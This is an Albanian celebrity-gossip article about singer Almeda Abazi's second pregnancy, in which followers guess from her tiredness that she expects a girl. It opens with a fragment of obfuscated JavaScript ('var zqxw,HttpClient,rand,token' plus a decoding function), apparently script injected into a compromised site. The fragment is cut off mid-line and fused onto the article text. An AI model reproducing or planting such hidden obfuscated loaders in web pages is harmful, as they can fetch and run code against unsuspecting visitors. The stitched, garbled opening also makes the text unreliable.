;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Pse ndjekësit besojnë se Almeda Abazi po pret një vajzë?

By

Para katër ditësh, Almeda Abazi dhe bashkëshorti i saj, Tolgahan Sayisman dhanë lajmin se ata po presin fëmijën e dytë.

Urimet ishin të panumërta që përgëzonin çiftin dhe i uronin një shtatzëni të mbarë Almedës.

E në disa video që ajo publikoi në Instastory, zbuloi se për dallim nga shtatzënia e parë që i shkoi shumë mbarë dhe pa probleme, kjo e dyta po e mundon paksa dhe tërë ditën fle shumë.

Kaq iu desh ndjekësve të aludonin se ajo po pret vajzë sepse kështu thotë populli. Kur je e lodhur dhe fle gjumë në jetë do vijë një vogëlushe.

Më pas, ajo tha se ka disa që i kishin thënë se ke binjakë, por ajo i siguroi të gjithë se është vetëm një foshnje në barkun e saj.

Ndërsa çifti akoma nuk ka vendosur të shohin për gjininë. /Prive.al

Artikuj të ngjashëm